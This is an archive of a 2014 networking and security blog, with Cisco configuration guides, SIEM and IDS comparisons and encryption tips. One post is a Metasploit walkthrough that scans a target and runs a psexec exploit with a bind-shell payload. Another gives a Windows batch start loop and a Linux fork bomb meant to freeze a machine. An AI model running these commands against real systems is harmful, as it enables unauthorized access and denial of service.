Wednesday, 31 December 2014

Windows can't stop your 'Generic volume' device because a program is still using it

Windows can't stop your 'Generic volume' device because a program is still using it. Close any programs that might be using the device, and then try again later

Solution:
1. Right click on my computer, select manage

2. Click on disk management tab

3. Left tab (which has probably "disk 1" labelled )on external storage drive right click and select "offline"

4. Now from task bar, from usb icon, click and select your device and remove it, Now it says "safely remove"

NOTE: when you plugin that external storage again, you must have to put it online by following above steps.

Thursday, 25 December 2014

PENETRATION TESTING WITH METASPLOIT FRAMEWORK 4 IN KALI

I am performing it in Kali Linux, assuming that you have gone through the installation steps of Kali Linux.

start the metasploit framework using following command in terminal
  • msfconsole
Note: It will take 2-3 minutes to start as it will initiate pqsql and metasploit service.

or use below commands.
  • service postgresql start
  • service metasploit start
  • msfconsole


Perform Port Scan of target
Metasploit offers an awesome port scanning function which goes by the name auxiliary scanner. Here is the command to execute this scan
  • use auxiliary/scanner/portscan/tcp

Type show options to see the available options
  • show options
Now we have to change a few settings, firstly, we should reduce the number of ports scanned
  • set ports 1-500


Secondly, we have to specify a target IP to scan. Now assuming that you already know the IP of your target. use following command to set the target.
  • set RHOST 192.168.63.131

Now we are ready for some action, do a show options again to see what all changes you've made. Finally run following command.
  • run
The scan will start and after some time it will show you which tcp ports are open and vulnerable to attack.


Finding Exploits

To find which exploits work on the OS of our target. Search for dcom on msfconsole.
  • search dcom

Copy the exploit as below.
  • use exploit/windows/smb/psexec_psh

Type show options again
  • show options

Again, set the RHOST as IP of your target
  • set RHOST 192.168.218.130

Also, set a payload.
  • set PAYLOAD windows/shell_bind_tcp

Finally start exploit
  • exploit
you can try different exploit and PAYLOAD to get the command prompt access of your target.

WINDOWS COMMANDS TO EXTRACT HARDWARE INFO

How to extract the hardware information in Windows using commands.

Following commands will list detailed information of RAM

  • wmic MemoryChip get BankLabel, Capacity, MemoryType, TypeDetail, Speed
  • wmic memorychip list full


Following commands will list the total RAM

  • wmic OS get FreePhysicalMemory /Value
  • systeminfo | findstr /C:"Total Physical Memory"


Following command will list all the details of Motherboard

  • wmic baseboard get product,Manufacturer,version,serialnumber

Following command will graphically list all the details of system
  • dxdiag

DoS ATTACK TO WINDOWS & LINUX

A Live DOS on your Windows/Linux Machine

We are going to execute a script/command in the Windows machine/Linux terminal that will cripple the operating system and make it freeze.

Following is a code to freeze the Windows machine. Put it in a .bat file and execute it.
:1
Start
goto 1



Following is a code to freeze the Linux machine.
:(){ :|:& };:

Monday, 10 November 2014

IBM QRadar and McAfee Nitro SIEM FEATURES

IBM QRADAR AND MCAFEE NITRO ESM COMPARISON

IBM QRadar SIEM FEATURES
The QRadar Integrated Security Solutions (QRadar) Platform is an integrated set of products for collecting, analyzing, and managing enterprise Security Event information. The various components that are part of this Platform are:
  • QRadar Log Manager - log management solution for Event log collection & storage.
  • QRadar SIEM - Correlation engine

  • X-Force Threat Intelligence - Automatically feeds X-Force data into IBM QRadar Security Intelligence Platform analytics to provide deeper insight and greater protection. Provides vulnerability coverage across a wide range of use cases to optimize the value of additional threat intelligence.
  • Vulnerability Manager - Vulnerability scanner and management tool set available to integrate Event data to Vulnerability data. This provides on demand scans, rescans and vulnerability tracking.
  • QFlow - Network Behavior Analysis & Anomaly detection using network flow data. QFlow provides payload information (up to Layer 7) in every detected event which is a great value addition to Netflow data. 
  • vFlow - Application Layer monitoring for both Physical & Virtual environment.
  • Risk Manager - monitors network topology, switch, router, firewall and Intrusion Prevention System (IPS) configurations to reduce risk and increase compliance. It simulates network attacks and models configuration changes to assess their security impact.
  • Incident forensics - Investigate security incidents using packets captured from across an enterprise network. Simplify the query process with an Internet search engine-like interface.

McAfee Nitro ESM FEATURES
Enterprise Security Manager - McAfee Enterprise Security Manager delivers a real-time understanding of the world outside—threat data, reputation feeds, and vulnerability status as well as a view of the systems, data, risks, and activities inside your enterprise.
  • Enterprise Log Manager (ELM) - Log Manager efficiently collects, compresses, and stores all log files.
  • Advanced Correlation Engine (ACE) - The Advanced Correlation Engine solution supplements Enterprise Security Manager Event correlation with two dedicated correlation engines and purpose-built performance:
·         A risk detection engine that generates a risk score using rule-less risk score correlation.
·         A threat detection engine that detects threats using traditional rule-based event correlation

  • Global Threat Intelligence (GTI) - McAfee Global Threat Intelligence constantly updated, rich feed for McAfee Enterprise Security Manager enhances situational awareness by enabling rapid discovery of events involving communications with suspicious or malicious IPs.

  • Vulnerability Manager - Vulnerability Manager with its McAfee Asset Manager feature, delivers unrivaled scalability and performance, actively or passively canvassing everything on your network. Now you can uncover devices hidden on your network as well as smartphones, tablets, and laptops that come and go between scheduled scans.
  • Asset Manager - McAfee Asset Manager uses passive and active scanning techniques to expand coverage to all devices at all times. This continuous asset monitoring integrates with industry-leading vulnerability scanning and incident management workflows to enable continuous asset compliance.
  • Application Data Monitor (ADM) - The Application Data Monitor appliance decodes an entire application session to Layer 7, providing a full analysis of everything from the underlying protocols and session integrity to the contents of the application itself (such as the text of an email or its attachments).
  • Database Event Monitor (DEM) - Database Event Monitor for SIEM delivers non-intrusive, detailed security logging of databases and applications, monitoring all access to sensitive corporate and customer data.
  • Risk Manager – McAfee risk management and security compliance help minimize risk, automate compliance, and optimize security.

Thursday, 2 October 2014

NESSUS NOT WORKING WITH LOCALHOST IN WINDOWS

IF YOU ACCIDENTELY CHANGED THE LISTEN ADDRESS IN SETTINGS --> ADVANCED --> LISTEN_ADDRESS --> 0.0.0.0 TO ANY OTHER THEN IT WILL NOT SHOW WITH FOLLOWING URL...

https://localhost:8834

IF YOU WANT TO RESET IT TO LOCALHOST THEN FOLLOW BELOW STEPS

1. Run CMD as an administrator

2. cd c:\program files\tenanble\nessus\

3. C:\Program Files\Tenable\Nessus>nessusd.exe -a 127.0.0.1

it will load nessus and all plugins to access through local host

open client url (https://localhost:8834) and go to settings.--> advanced --> listen_address --> set it to 0.0.0.0



then you can access it with
https://localhost:8834

Saturday, 13 September 2014

CONFIGURE SITE-TO-SITE IPSEC VPN

Cisco Router - Configure Site to Site IPSEC VPN


1. Setup a policy for phase 1 of the tunnel (ISAKMP).
R1(config)# crypto isakmp policy 1
R1(config-isakmp)# encr aes
R1(config-isakmp)# hash sha
R1(config-isakmp)# authentication pre-share
R1(config-isakmp)# group 2
R1(config-isakmp)# lifetime 86400
R1(config-isakmp)# crypto isakmp key SecretK3y address 1.1.1.2

2. Setup an ACL to define what traffic will be encrypted, and a 'Transform set' that will dictate the encryption and hashing for phase 2 (IPSEC).
R1(config)# ip access-list extended VPN-ACL
R1(config-ext-nacl)# permit ip 10.10.10.0 0.0.0.255 20.20.20.0 0.0.0.255
R1(config-ext-nacl)# crypto ipsec transform-set VPN-TS esp-aes esp-sha-hmac

3. Create a 'Crypto map' that is used to apply the phase 2 settings to an interface.
R1(config)# crypto map VPN-C-MAP 10 ipsec-isakmp
R1(config-crypto-map)# set peer 1.1.1.2
R1(config-crypto-map)# set transform-set VPN-TS
R1(config-crypto-map)# match address VPN-ACL

4. Apply that crypto map to an interface, (usually the Internet facing one).
R1(config-crypto-map)# interface Serial0/1/0
R1(config-if)# crypto map VPN-C-MAP
R1(config-if)# exit

5. To stop our VPN traffic getting NATTED, we need to put a deny in that ACL, and put it before that permit statement. Remember:
• Permit=Perform NAT
• Deny=Don't perform NAT
On this router (unlike the ASA's that I'm more used to), there is no option to define an ACL line number. So its easier to remove the existing one, add the new line then put the original one back. Finally save the changes.

R1(config)# no access-list 100 permit ip 10.10.10.0 0.0.0.255 any
R1(config)# access-list 100 deny ip 10.10.10.0 0.0.0.255 20.20.20.0 0.0.0.255
R1(config)# access-list 100 permit ip 10.10.10.0 0.0.0.255 any
R1(config)# exit

6. Now at the other site, the config should be a mirror image. I will post it in its entirety, so you can copy and paste it into the router, I will highlight the bits you need to check and change in red.
crypto isakmp policy 1
encr aes
hash sha
authentication pre-share
group 2
lifetime 86400
crypto isakmp key SecretK3y address 1.1.1.1
ip access-list extended VPN-ACL
permit ip 20.20.20.0 0.0.0.255 10.10.10.0 0.0.0.255
crypto ipsec transform-set VPN-TS esp-aes esp-sha-hmac
crypto map VPN-C-MAP 10 ipsec-isakmp
set peer 1.1.1.1
set transform-set VPN-TS
match address VPN-ACL
interface Serial0/1/0
crypto map VPN-C-MAP
no access-list 100 permit ip 20.20.20.0 0.0.0.255 any
access-list 100 deny ip 20.20.20.0 0.0.0.255 10.10.10.0 0.0.0.255
access-list 100 permit ip 10.10.10.0 0.0.0.255 any

7. Test your VPN with the following commands. Note: you need to send some traffic over the VPN before it will establish!
show crypto isakmp sa
show crypto ipsec sa

Sunday, 24 August 2014

CISCO ROUTER BUFFERS TUNING

How to Tuning Cisco Router Buffers?
The router maintains two different sets of buffers: public buffers and interface buffers
The router uses these as temporary storage while processing packet data. You can tune the public buffer pools as follows:
Router1#configure terminal
Enter configuration commands, one per line. 
Router1(config)# buffers big initial 100
Router1(config)# buffers big max-free 200
Router1(config)# buffers big min-free 50
Router1(config)# buffers big permanent 50
Router1(config)# end
Router1#
And you can adjust the interface buffer pools by using a similar set of commands:
Router1#configure terminal
Enter configuration commands, one per line.
Router1(config)# buffers Ethernet0 initial 200
Router1(config)# buffers Ethernet0 max-free 300
Router1(config)# buffers Ethernet0 min-free 50
Router1(config)# buffers Ethernet0 permanent 50
Router1(config)# end
Router1#


Wednesday, 25 June 2014

MBSA AUTHORIZED REMOTE SCAN

How to run Microsoft Baseline Security Analyzer remotely with a user credentials?

1. Run command prompt as an administrator.

2. Switch the path to the MBSA parth.
cd c:\Program Files\Microsoft Baseline Security Analyzer 2\

3. Run MBSA as a specific user on a remote machine.
c:\Program Files\Microsoft Baseline Security Analyzer 2>runas /netonly /user:10.10.10.240\user mbsa.exe

4. Enter the password for 10.10.10.240\user:

Attempting to start mbsa.exe as user "10.10.10.240\user" ...
c:\Program Files\Microsoft Baseline Security Analyzer 2>

It will start MBSA with given user name "user" and password.

5. As MBSA shown up then press "Scan a computer"

6. Add IP address of destination computer and press "Start Scan"

Friday, 20 June 2014

HOW ETHERCHANNEL WORKS?

The Inner Workings of EtherChannel

EtherChannel is a very important technology for modern networks. As bandwidth demands continue to increase with more and more traffic forms converging onto the single network infrastructure, EtherChannels importance is magnified even more. 

Link Aggregation Protocols
As mentioned earlier, EtherChannel actually aggregates individual Ethernet links into a single logical link that provides bandwidth up to 1600 Mbps, in the case of Fast Ethernet, or 16 Gbps when Gigabit interfaces are used to create the logical link. The restriction, however, is that all the bundled interfaces must be configured with matching speed and duplex settings, and both ends of each link must be configured as either a Layer 2 or Layer 3 interface. 

If an individual link within an EtherChannel bundle fails, traffic previously carried over the failed link is carried over the remaining links within the EtherChannel.

An EtherChannel can be configured in one of these two dynamic modes:
• Port Aggregation Protocol (PAgP) is a Cisco proprietary protocol used to automate the logical aggregation of Ethernet switch ports. This means PAgP can only be used between Cisco switches. 
• Link Aggregation Control Protocol (LACP) is an industry standard protocol designed to automate the logical aggregation ethernet ports. Also know by its IEEE designation 802.3ad LACP is not tied to any specific vendor.
Port Aggregation Protocol (PAgP)
As we have already discussed, PAgP packets are sent between EtherChannel capable ports to facilitate the negotiation needed for the successful creation of a channel. When PAgP sees matched Ethernet links, it will group the links into an EtherChannel. 
PAgP uses three modes of operation:
• Auto—places an interface into a passive negotiating state, meaning that the interface will respond to PAgP packets it receives but it will not initiate PAgP packet negotiation. This setting minimizes the transmission of PAgP packets and is the default on devices like Catalyst 3560.
• Desirable—places an interface into an active negotiating state, meaning that the interface will start negotiations with other interfaces by sending PAgP packets.
• On—forces the interface to channel without PAgP. With the on mode, a usable EtherChannel exists only when an interface group in the on mode is connected to another interface group in the on mode. This is referred to as static aggregation.
Link Aggregation Control Protocol (LACP)
LACP performs the exact same function as the Cisco proprietary PAgP but it does it by sending LACP packets to its peer. Because LACP is an IEEE standard, it can be used to facilitate EtherChannels in mixed vendor environments.
LACP, like PAgP, has three modes of operation:
• Passive— The switch does not initiate the channel, but does respond to incoming LACP packets. When a peer initiates negotiation (by sending out an LACP packet) which we receive and reply to, eventually forming the aggregation channel with the peer. This is similar to the auto mode in PAgP.
• Active—We are willing to form an aggregate link and will actively seek to start the negotiation. The link aggregate will be formed if the other end is running in LACP active or passive mode. This is similar to the desirable mode of PAgP.
• On—A link aggregation is forced to be formed without any LACP negotiation. In other words, the switch will neither send the LACP packet nor process any incoming LACP packet. This is similar to the on state for PAgP. Again, this is referred to as static aggregation.

Configuration 
We only need a single command line to configure a group of ports to operate as an EtherChannel:
SW1(config)# interface range f0/23 -24
SW1(config-if-range)# channel-group 23 mode active
Creating a port-channel interface Port-channel 23
As expected, we have successfully created the logical interface Port-channel23. Note that any switchport configurations applied to this virtual interface will be replicated to the physical member interfaces. We can verify the configuration and the status of an EtherChannel by using the 'show EtherChannel summary' command:
SW1# show EtherChannel summary
Flags: D–down P–bundled in port-channel
I–stand-alone s–suspended
H–Hot-standby (LACP only)
R–Layer3 S–Layer2
U–in use f–failed to allocate aggregator
------+-------------+-----------+-------------------------------
1 Po23(SD) LACP Fa0/23(D) Fa0/24(D)

HOW STP WORKS

How Spanning Tree Protocol Works?

When a switch first power up it assumes that it is the Root Bridge itself and switch begins by sending out BPDUs with a Root Bridge ID and Sender ID equal to its own Bridge ID. As the BPDU goes out through the network, each switch compares its own BPDU with the one that switch receives from the neighbors. The comparison is done on bridge ID. When a switch hears of a better Root Bridge (lower bridge ID), it replaces its own Root Bridge ID with the Root Bridge ID announced in the BPDU although it still identifies itself as the Sender Bridge ID. After sometime the switch with the lowest bridge ID in the network wins this Root Bridge election process. 

• STP Rule 1: All ports of the root bridge will be in forwarding mode. 
o Next, each switch determines the best path to get to the root. The switches determine this path based on Root Path Cost. This value is the cumulative cost of all the links leading to the Root Bridge. The switch uses the port with the least Root Path Cost in the BPDU in order to get to the root switch; the port with the least Root Path Cost in the BPDU is the root port. 
• STP Rule 2: The root port must be set to forwarding mode. 
o In addition, the switches on each LAN segment communicate with each other to determine which switch is best to use in order to move data from that segment to the root bridge and this determination is based on the lowest cumulative Root Path Cost to the Root Bridge. And the port is called the designated port. 
• STP Rule 3: The designated port must be set to forwarding mode. 
• STP Rule 4: All the other ports in all the switches must be placed in blocking mode. 

If two or more links might identical Root Path Costs then that will results in a tie condition. All tiebreaking STP decisions are based on the following sequence of four conditions:
• Lowest Root Bridge ID
• Lowest Root Path Cost to Root Bridge
• Lowest Sender Bridge ID
• Lowest Sender Port ID

STP PORT STATE:
• Blocking:
All the port by default on a switch will be in the blocking state. In blocking state we are only allowed to receive BPDU. We can't build our MAC Table at this state.
• Listening:
If the port on the switch is administratively enabled it move to listening state. At this state it can receive and transmit BPDU. Hence it involved in the election of Root Bridge. This state has a timer enabled which has to be elapsed before getting to the next state. This timer is called as forward delay timer and its default value is 15sec. 
• Learning:
At this state port can receive and transmit BPDU and also can start building MAC table. But it can't receive or transmit data frames at this state. This state also has forward delay timer and the default value of the timer is 15sec.
• Forwarding:
At this state port can receive and transmit BPDU & DATA Frames and also we will continue to build our MAC table.

NETWORK MANAGEMENT TOOLS 2014

Top Network Management Tools in 2014
1- Solarwinds Network Performance Manager 10.5
Solarwinds is a heavyweight in the network-monitoring world, and for good reason. For years, Solarwinds NPM has provided all-round monitoring capability. With the release of NPM 10.5, Solarwinds has dropped the “Orion” product branding (it’s now officially ‘Solarwinds Network Performance Manager’ or ‘NPM’) in addition to stepping up the scalability of their game. NPM 10.5 has several new features and many improvements.

NPM 10.5 can handle basic SNMP monitoring and alerting just like always. New features include VMware & Hyper-V monitoring; and ConnectNow, an automated network mapping tool. ConnectNow appears to be based on the old LanSurveyor tool, but now nicely integrates into NPM. Improved historical trend reporting is also a welcome change. And, a redesigned UI rounds out the list of improvements.

2- OpenNMS 1.10
OpenNMS is open-source network management software. It’s truly an awesome, incredibly flexible package – and did we mention it’s free? It can handle virtually any network management task: device management, application performance monitoring, inventory, trouble alerting – it does it all. Support is available online from the OpenNMS user community, or for a fee from the OpenNMS group – the commercial arm of OpenNMS.

New features in 1.10.9 include:
• IPv6 support throughout
• Web page and web application monitoring from recorded user scripts, via Selenium integration
• New default syslog receiver rules for a handful of commonly encountered applications
• XML performance data collection protocols

3- Ipswitch Whatsup Gold Premium 16
Another fierce competitor is Whatsup Gold. Whatsup Gold is a full-featured network management suite. It can monitor devices using SNMP – but adds the ability to monitor application availability using synthetic transactions.
Whatsup Gold also features WMI support for Windows monitoring, and agentless SSH monitoring for Linux/Unix systems – making it ideal for monitoring everything on your network.

A wide range of plugins are available for Whatsup Gold, adding support for everything from VMware and VOIP management to configuration and Flow reporting.

New features in version 16 include:
• Wireless infrastructure management for Cisco and Aruba networks
• Layer 2 discovery, network mapping and asset tracking tools
• New scaling tools for large networks
• Updated SQL query and WMI formatted monitors
• Expanded Windows services, Active Directory, Exchange support, Powershell/.NET support.

4- Dartware Intermapper 5.6
Intermapper is a great tool. It’s based around the idea that a network map is the most important thing to a network administrator. Intermapper uses a series of maps to display the status of your network. Like other products, it also does SNMP polling, as well as application monitoring using customized “probes.”

A major strength is the way the map includes not just devices, but active status of connections between devices. Traffic volume between devices is represented with a crawling-ant display, and trouble is easily identified by colored indicators. And, it also supports notifications and logging like other products.

New functionality in version 5.6 includes:
• Web server identification: InterMapper can now identify HTTP servers during auto-discovery, and automatically creates probe groups to monitor them
• ARP discovery: InterMapper now uses the ARP table to find additional devices during auto-discovery, broadening its view of the network
• Multiple UI enhancements
• Mobile device-optimized reports
• Additional tools to manage how data is exported to the database
• New fields in labels, notifiers and status windows.

LAYER 3 SWITCH AND A ROUTER

Is Layer-3 Switch More than a Router?
You might think that layer-3 switches perform bridging and routing, while routers do only routing. That hasn’t been the case at least since Cisco introduced Integrated Routing and Bridging in IOS release 11.2 more than 15 years ago. However, Simon Gordon raised an interesting point in a tweet: “I thought IP L3 switching includes switching within subnet based on IP address, routing is between subnets only.”

Layer-3 switches and routers definitely have to perform some intra-subnet layer-3 functions, but they’re usually not performing any intra-subnet L3 forwarding.

Let’s start with the intra-subnet functions the layer-3 forwarding devices (whether you call them switches or routers) do:
• Dynamic neighbor discovery through ARP/ND for packets sent to hosts in directly attached subnets (glean adjacencies in CEF terminology);
• Generation of host routes based on ARP/ND results (cached adjacencies in CEF terminology);
• Forwarding of IP packet to directly attached IP hosts based on ARP/ND-generated host routes.
However, if a layer-3 forwarding device performs MAC-based forwarding in combination with IP-based forwarding, it usually uses the destination MAC address to figure out which forwarding method to use:
• Layer-2 frames sent to router’s own MAC address are passed up the protocol stack into the IP forwarding code (and if the IP packet is sent to router’s IP address, the packet is sent to the control plane for further processing);
• Layer-2 frames sent to other destination MAC addresses are passed to MAC forwarding code, which performs MAC address table (or TCAM) lookup and forwards, floods or drops the packet.

I haven’t seen a device (yet) that would use IP protocol type (0x0800) in Ethernet header to decide whether to use MAC-based or IP-based forwarding. If you’ve seen one, please write a comment (overzealous DSL concentrators that violate layering by peeking inside PPPoE sessions don’t count).

Summary: There’s no difference in intra-subnet (intra-VLAN) forwarding between a router (layer-3 switch) and a simple bridge (layer-2 switch). However, an IP-aware device (even a more sophisticated layer-2 switch) might support IP-based port access lists or DSCP- or ACL-based QoS.

Monday, 19 May 2014

HOW TO CONFIGURE SSH ON A CISCO SWITCH

How to Configure SSH on a Cisco Switch?
Telnet is a widely used protocol for accessing and administering Cisco devices. But this protocol is not exactly secure and transmits data over a network in plain text. 

SSH is a secure protocol and it’s best practice to secure your access to all devices. Configuring SSH on most Cisco switch models is a straightforward process. You will need to generate a key and it is recommended to enable the aaa (Authentication, Authorization and Accounting) model.

Here are the steps:
Switch# config t
Switch(config)# ip domain-name demo.net
Switch(config)# crypto key generate rsa

At this point, you will be prompted to enter a modulus number for the key generation:

Switch(config)# username admin privilege 15 secret ‘password’ (you could create more usernames)
Switch(config)# aaa new model (To enable the aaa model on the switch)
Switch(config)# line vty 0 15
Switch(config-line)# transport input ssh
Switch(config-line)# no password
Switch(config-line)# transport preferred ssh
Switch(config-line)# exit
Switch(config)# exit
Switch# copy run start (To save the configuration changes) 

After these steps, the cisco device could be access using tools such as Putty, Cygwin. Cygwin could also be configured to integrate with your PowerShell interface and save you the time involved in switching between shells. You could also configure the Start-Transcript cmdlet in your PowerShell profile to keep a log of your commands if necessary.

Sunday, 18 May 2014

VLAN DIFFERENCE BETWEEN JUNIPER AND CISCO

VLAN Difference between Juniper and Cisco Switches
A VLAN (Virtual Local Area Network) is a logical LAN segment which have unique broadcast domain. Basically, VLAN divides one physical switch to multiple logical switch. You can configure hundreds of VLANs in one EX series switch. No matter if its EX4200, EX3200 or EX2200. Today I will show you VLAN difference between Juniper and Cisco switches.

There are two port modes in Juniper switch i.e. access mode or trunk mode. The interface in access mode connects to a network device, such as laptop or an IP phone. The interface in trunk mode connects to other switches in the network. 

There are many differences between Juniper and Cisco switches.

1. In Cisco switches the default port mode is dynamic desirable auto but in Juniper switch the default port mode is access mode.
2. In Cisco switches the default VLAN is untagged and is the native VLAN i.e. VLAN 1 but in Juniper there is no default native VLAN. You must configure it manually.
3. In Cisco switches the trunk ports accept all VLANs in the range of 1 to 4095 by default but in Juniper, trunk ports do not support any VLANs. You have to make it support manually.
4. In Juniper switches, VLAN named Default is present by default and all the interfaces are under this default VLAN.
5. Unlike Cisco switches Juniper switches doesn’t support VTP (VLAN Trunking Protocol) or DTP (Dynamic Trunking Protocol). Juniper switches support GVRP (Generic Attribute Registration Protocol) though.
6. Juniper switches has two port modes i.e. access and trunk mode. Cisco switches have five port modes i.e. dynamic desirable auto, dynamic desirable, access, trunk and nonegotiate mode.
7. Juniper switches support 802.1Q protocol for trunk ports. Cisco switches support both 802.1Q and ISL (Inter Switched Link) protocols.


Friday, 16 May 2014

COMMAND TO LIST ALL SHARED FOLDERS ON WINDOWS SERVER

How to List down shared folders on a windows server?

Below are the powershell commands to list the shared folders and access rights of shared folders.

open powershell with Administrator privileges and paste below command in it.
//To list the shared folders on localhost
gwmi -Class Win32_Share -ComputerName localhost | sort name

//To list the shared folders on remote server
gwmi -Class Win32_Share -ComputerName 10.10.1.x | sort name

//To save shared folders list to a file
gwmi -Class Win32_Share -ComputerName localhost | sort name | out-file C:\TS1.txt

//To list the access rights of a shared folder
Get-Acl D:\TestShare | select -exp Access | out-file C:\TS1\TS1permissions.txt

//To list the access rights of a shared folder and save it to a file.
Get-Acl D:\TestShare | select -exp Access | out-file C:\TS1\TS1permissions.txt


TO LIST DOWN SHARE FOLDERS AND ACCESS RIGHTS IN WINDOWS SERVER 2003

Open command prompt with "Run as" administrator
//To list all the share folders on a server
wmic /output:filename.txt share get caption,name,path

//To list Access rights of a share folder
icacls  sharefoldername /save ts21share.txt

//To list the Access rights of a share folder
cacls sharename 

Saturday, 10 May 2014

DIFFERENCE BETWEEN IDS AND IPS

What is an IDS?
IDS (Intrusion Detection System) are systems that detect activities that are inappropriate, incorrect or anomalous in a network and report them. Furthermore, IDS can be used to detect whether a network or a server is experiencing an unauthorized intrusion. IPS (Intrusion Prevention System) is a system that actively disconnects connections or drops packets, if they contain unauthorized data. IPS can be seen as an extension of IDS.

IDS
IDS monitor the network and detect inappropriate, incorrect or anomalous activities. There are two main types of IDS. First one is the Network intrusion detection system (NIDS). These systems examine the traffic in the network and monitor multiple hosts for identifying intrusions. Sensors are used to capture the traffic in the network and each packet is analyzed to identify malicious content. The second type is the Host-based intrusion detection system (HIDS). HIDS are deployed in host machines or a server. They analyze data that are local to the machine such as system log files, audit trails and file system changes to identify unusual behavior. HIDS compare the normal profile of the host with the observed activities to identify potential anomalies. In most places, IDS installed devices are placed in between the boarder router and the firewall or outside the boarder router. In some cases IDS installed devices are placed outside the firewall and boarder router with the intension of seeing the full breadth of attempted attacks. Performance is a key issue with IDS systems since they are used with high bandwidth network devices. Even with high performance components and updated software, IDS tend to drop packets since they cannot handle the large throughput.

What is an IPS?
IPS
IPS is a system that actively takes steps to prevent an intrusion or an attack when it identifies one. IPS are divided in to four categories. First one is the Network-based Intrusion Prevention (NIPS), which monitors the entire network for suspicious activity. The second type is the Network Behavior Analysis (NBA) systems that examine the traffic flow to detect unusual traffic flows which could be results of attack such as distributed denial of service (DDoS). The third kind is the Wireless Intrusion Prevention Systems (WIPS), which analyzes wireless networks for suspicious traffic. The fourth type is the Host-based Intrusion Prevention Systems (HIPS), where a software package is installed to monitor activities of a single host. As mentioned earlier, IPS takes active steps such as dropping packets that contain malicious data, resetting or blocking traffic coming from an offending IP address.

What is the difference between IPS and IDS?
An IDS is a system that monitors the network and detects inappropriate, incorrect or anomalous activities, while an IPS is a system that detects intrusion or an attack and takes active steps to prevent them. Main deference between the two is unlike IDS, IPS actively takes steps to prevent or block intrusions that are detected. These preventing steps include activities like dropping malicious packets and resetting or blocking traffic coming from malicious IP addresses. IPS can be seen as an extension of IDS, which has the additional capabilities to prevent intrusions while detecting them.

Wednesday, 7 May 2014

ENCRYPT THE DATA YOU STORE

ENCRYPT THE DATA YOU STORE
This protects your data from being read by people with access to your computer.

Encrypt your hard drive so that if you lose your computer or you get hacked, your information will be safe. Most recent Apple Macintosh computers contain a built-in encryption system called FileVault that is simple to use. Some versions of Microsoft's Windows 7 also contain a built-in encryption system called BitLocker. Another popular solution is the free, open-source program TrueCrypt, which can either encrypt individual files or entire partitions of your computer or an external hard drive.

Encrypt your smartphone's hard drive. Yes — your smartphone has a hard drive much like your computer has. In fact, your phone probably contains as much — or more — sensitive information about you as your computer does. Apple doesn't let you encrypt your smart phone's hard drive or the files on it, though it allows encryption of your phone's backup files on iTunes or iCloud. You can also use Find my iPhone to remotely "wipe," or delete the data on your iPhone or iPad if it is lost or stolen. Google's Android operating system lets you encrypt your phone hard drive.

Encrypt the data you store in the cloud. I use the SpiderOak encrypted cloud service. If an encrypted cloud service were somehow forced to hand over their servers, your data would still be safe, because it's encrypted using a key stored only on your computer. However, this also means that if you lose your password, they can't help you. The encrypted data would be unrecoverable.

Encrypt the data you transmit. The Snowden revelations have revealed that U.S. and British spy agencies are grabbing as much unencrypted data as they can find as it passes over the Internet. Encrypting your data in transit can protect it against spy agencies, as well as commercial data gatherers.

Install HTTPS Everywhere on your Web browser. This encrypts your Web browsing sessions, protecting you from hackers and spy agencies that scoop up unencrypted traffic across the Internet. Not every site works properly with HTTPS Everywhere, though an increasing number do.

Use encrypted texting apps with friends who install the same apps on their phones. On the iPhone, Silent Circle and Wickr offer apps for encrypted texting. On Android, the TextSecure app encrypts texts in transit and when they are stored on your device.

Use the Off-the-Record Messaging protocol to encrypt your instant messaging conversations. You can still use your favorite instant-messaging service, such as Gchat or AIM, though you'll need to use a software client that supports the Off-the-Record protocol. On Macs, free software called Adium can enable OTR chats, and on Windows, you can use Pidgin. Once you've set up OTR and gone through a simple verification step, you can IM as you usually do. Both parties have to use OTR for the encryption to work.

Use Gnu Privacy Guard to encrypt your email conversations. Like OTR, if you're using GPG you'll need the people you email with to use it as well in order to encrypt your conversations. I use free software called GPG Tools with Enigmail and Postbox. GPG Tools also works directly with Apple's built-in Mail program.

GPG has some shortcomings — it's difficult-to-impossible to use it with the mail program built into most smartphones, and you can't use it easily with webmail like Gmail. (Although there are some new web-based mail programs that use GPG called Mailvelope and StartMail that I haven't had a chance to try yet.)

The most difficult part of GPG is that, unlike the encrypted texting and instant messaging programs, you have to generate a secret key and keep it somewhere secure (usually on your computer or on a USB stick). This often means you can only send GPG mail when you have your key with you. Even so, it is incredibly satisfying once you send your first message and watch it transform into a block of numbers and letters when you click "encrypt."

Monday, 5 May 2014

SNORT AND OSSEC FEATURES

SNORT AND OSSEC FEATURES

SNORT:
Snort is an open source network intrusion prevention and detection system, IDS and IPS. This tool developed by Sourcefire team, combining the benefits of signature, protocol, and anomaly-based inspection. This is very powerful tool and more useful for Penetration Testers, and Security Reasercher.

Snort can perform protocol analysis and content searching/matching. It can be used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting attempts, and much more. It uses a flexible rules language to describe traffic that it should collect or pass, as well as a detection engine that utilizes a modular plug-in architecture. Snort has a real-time alerting capability as well, incorporating alerting mechanisms for syslog, a user specified file, a UNIX socket, or WinPopup messages to Windows clients. Snort has three primary uses: a straight packet sniffer like tcpdump, a packet logger (useful for network traffic debugging, etc), or a full-blown network intrusion prevention system.
OSSEC is an Open Source Host-based Intrusion Detection System that performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response.

Manager
The manager is the central piece of the OSSEC deployment. It stores the file integrity checking databases, the logs, events and system auditing entries. All the rules, decoders and major configuration options are stored centrally in the manager, making easy to administer even a large number of agents.

Agents
The agent is a small program installed on the systems you desire to monitor. It will collect information on real time and forward to the manager for analysis and correlation. It has a very small memory and CPU footprint by default, not affecting with the system’s usage.
Agent security: It runs with a low privilege user (created during the installation) and inside a chroot jail isolated from the system. Most of the agent configuration is pushed from the manager, with just some of them are stored locally on each agent. In case these local options are changed, the manager will receive the information and will generate an alert.

Agentless
For systems that you can’t install an agent, OSSEC allows you to perform file integrity monitoring on them without the agent installed. It can be very useful to monitor firewalls, routers and even Unix systems where you are not allowed to install the agent.

Virtualization/Vmware
OSSEC allows you to install the agent on the guest operating systems or inside the host (Vmware ESX). With the agent installed inside the VMware ESX you can get alerts about when a VM guest is being installed, removed, started, etc. It also monitors logins, logouts and errors inside the ESX server. In addition to that, OSSEC performs the CIS checks for Vmware, alerting if there is any insecure configuration option enabled or any other issue.

Firewalls, switches and routers
OSSEC can receive and analyze syslog events from a large variety of firewalls, switches and routers. It supports all Cisco routers, Cisco PIX, Cisco FWSM, Cisco ASA, Juniper Routers, Netscreen firewall, Checkpoint and many others.